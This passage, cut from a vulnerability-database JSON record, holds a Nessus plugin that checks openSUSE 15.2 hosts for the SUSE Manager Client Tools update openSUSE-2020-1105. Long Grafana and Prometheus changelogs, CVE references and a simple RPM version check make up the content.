Fixes issue where only entire lines were being\n copied.\n\n + Explore: Fixes query field layout in splitted view for\n Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes\n grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching\n to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less\n annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow\n unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time\n series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if\n cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links\n correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying\n datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint timestamp correctly when\n interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1,\n @davkal\n\n + Graph: Fixes legend issue clicking on series line icon\n and issue with horizontal scrollbar being visible on\n windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1\n match when loading query editor. #18480 5, @hugohaggmark\n 3\n\n + Prometheus: More consistently allows for multi-line\n queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4,\n @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and\n issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels\n with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if\n cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the\n cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12,\n @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but\n hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all\n given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for\n Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in\n label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user\n auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana\n variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch\n Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting\n to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from\n debian:stretch to avoid security issues&hellip; #17066\n 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895\n 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in\n explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns\n into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by\n field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by\n limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674\n 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793,\n @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425,\n @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3,\n @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table &\n sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1,\n @ATTron\n\n + Logging: Move log package to pkg/infra. #17023,\n @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2,\n @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and\n year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client\n certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery\n flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step\n alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range\n instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels\n query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist\n yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1,\n @dehrax\n\n + Singlestat: Add y min/max config to singlestat\n sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876,\n @zhulongcheng\n\n + Templating: Correctly display __text in multi-value\n variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a\n multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009\n 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2,\n @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel\n description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login\n failure due to SameSite cookie policy. #18332 1,\n @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of\n $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in\n Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2,\n @xlson\n\n + TimePicker: Fixed style issue for custom range popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges\n didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1,\n @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget\n . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql\n error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard\n requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061,\n @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table\n are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121,\n @marefr\n\n + Fix: Wrap value of multi variable in array when coming\n from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved\n last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with\n variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2,\n @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path\n prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label\n value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in\n interpolated PromQL variables. #16932, @Limess\n\n + Prometheus: Fix when adding label for metrics which\n contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value\n turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in\n %install, add to %files) handling of /var/lib/grafana/*\n and\n\nkoan :\n\n - Calculate relative path for kernel and inited when\n generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be\n disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for\n osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback\n (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with\n uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII\n chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled\n (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so\n scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards\n in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty\n (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2\n (bsc#1153090)\n\n - Java api expects content as encoded string instead of\n encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and\n Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc,\n configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to\n spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump\n (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for\n spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel\n definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl\n (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2\n systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1113160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1138822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1148177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172462\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected SUSE Manager Client Tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dracut-saltboot\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"dracut-saltboot-0.1.1590413773.a959db7-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dracut-saltboot\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:dracut-saltboot"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-07-29T03:58:41", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "OPENSUSE-2020-1105.NASL", "hash": "36c41db057d46ad5d1837d299814652c80856877a7bebc95471d354c36b15331", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)", "description": "This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n ", "published": "2020-07-28T00:00:00", "modified": "2020-07-28T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 8.2, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/139022", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1154940", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113160", "https://bugzilla.opensuse.org/show_bug.cgi?id=1148177", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170557", "https://bugzilla.opensuse.org/show_bug.cgi?id=1171687", "https://bugzilla.opensuse.org/show_bug.cgi?id=1155372", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153277", "https://bugzilla.opensuse.org/show_bug.cgi?id=1168310", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170824", "https://bugzilla.opensuse.org/show_bug.cgi?id=1138822", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170231", "https://bugzilla.opensuse.org/show_bug.cgi?id=1154968", "https://bugzilla.opensuse.org/show_bug.cgi?id=1163871", "https://bugzilla.opensuse.org/show_bug.cgi?id=1172462", "https://bugzilla.opensuse.org/show_bug.cgi?id=1165921", "https://bugzilla.opensuse.org/show_bug.cgi?id=1142038", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153090"], "cvelist": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "immutableFields": [], "lastseen": "2020-07-31T03:51:42", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2020-07-31T03:51:42", "references": [{"idList": ["REDHAT-RHSA-2020-2676.NASL", "OPENSUSE-2020-892.NASL", "ORACLELINUX_ELSA-2020-2641.NASL", "FEDORA_2019-0BB6B876DA.NASL", "FEDORA_2019-77D612EAB4.NASL", "FEDORA_2020-A09E5BE0BE.NASL", "SUSE_SU-2020-1970-1.NASL", "REDHAT-RHSA-2020-1659.NASL", "FEDORA_2020-E6E81A03D6.NASL", "REDHAT-RHSA-2020-2641.NASL"], "type": "nessus"}, {"idList": ["1337DAY-ID-34640"], "type": "zdt"}, {"idList": ["OPENSUSE-SU-2020:0892-1", "OPENSUSE-SU-2020:1105-1"], "type": "suse"}, {"idList": ["ELSA-2020-5726", "ELSA-2020-2641", "ELSA-2020-1659"], "type": "oraclelinux"}, {"idList": ["SMNTC-110352"], "type": "symantec"}, {"idList": ["RHSA-2020:2792", "RHSA-2020:2641", "RHSA-2020:2861", "RHSA-2020:2796", "RHSA-2020:2676", "RHSA-2020:1659", "RHSA-2019:3771"], "type": "redhat"}, {"idList": ["OPENVAS:1361412562310876775", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310144077", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310142855", "OPENVAS:1361412562310143778", "OPENVAS:1361412562310876781", "OPENVAS:1361412562310877964"], "type": "openvas"}, {"idList": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "type": "cve"}, {"idList": ["EDB-ID:48638"], "type": "exploitdb"}, {"idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"], "type": "avleonov"}, {"idList": ["PACKETSTORM:158320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-07-31T03:51:42", "rev": 2, "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "139022", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1105.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139022);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/30\");\n\n script_cve_id(\"CVE-2019-10215\", \"CVE-2019-15043\", \"CVE-2020-12245\", \"CVE-2020-13379\");\n\n script_name(english:\"openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)\");\n script_summary(english:\"Check for the openSUSE-2020-1105 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore\n remote read). #7096\n\n - Rules: `rule_evaluations_total` and\n `rule_evaluation_failures_total` have a `rule_group`\n label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a\n block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel\n configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group\n that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an\n empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web\n handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased\n memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries\n and recording rules are guaranteed to only see full\n scrapes and full recording rules. This comes with a\n certain overhead in resource usage. Depending on the\n situation, there might be some increase in memory usage,\n CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets\n page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload\n #6745\n\n - Scrape: Log scrape append failures as debug rather than\n warn #6852\n\n - TSDB: Improve query performance for queries that\n partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label\n #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s\n service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector\n #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834\n #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using\n non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote\n storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader\n metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling\n #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call'\n errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two\n scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file\n #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago'\n duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs\n with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only\n touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error\n messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape\n cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the\n metadata cache #6675\n\n - promtool: Add support for line-column numbers for\n invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary\n #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers\n #6553\n\n - React UI: adopt grafana flot fix for stacked graphs\n #6603\n\n - React UI: broken graph page browser history so that back\n button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered,\n and log proper error if one is returned from head.Init\n #6616\n\n - TSDB: return an error on ingesting series with duplicate\n labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine,\n which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if\n they are produced by multiple identical label matchers\n #6493\n\n - Scrape: Validate that OpenMetrics input ends with `#\n EOF` #6505\n\n - Remote read: return the correct error if configs can't\n be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed\n context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases\n where we would always be consistently behind by tracking\n pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a\n rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with\n Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: Fixed race on concurrent queries against same\n data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*`\n metrics. Additionally\n `prometheus_sd_kubernetes_workqueue_latency_seconds` and\n `prometheus_sd_kubernetes_workqueue_work_duration_second\n s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on\n `prometheus_remote_storage_*` metrics to `remote_name`\n and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded\n TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during\n compaction which should result in lower memory footprint\n during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention\n calculation. #5886\n\n - Remote read: Added query grouping and range hints to the\n remote read request #6401\n\n - Remote write: Added\n `prometheus_remote_storage_sent_bytes_total` counter per\n queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets`\n #6276, TSDB status page #6281 #6267 and many other fixes\n and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range\n and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss\n targets when configurations are similar. #6455\n\n - Remote write: Value of\n `prometheus_remote_storage_shards_desired` gauge shows\n raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and\n alerts where metric results collide with labels\n specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now\n accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and\n `/api/v1/status/buildinfo` endpoints added for use by\n the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime &\n Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a\n compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when\n checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in\n remote write. #6113\n\n - Remote write: do not reshard when unable to send\n samples. #6111\n\n - Service discovery: errors are no longer logged on\n context cancellation. 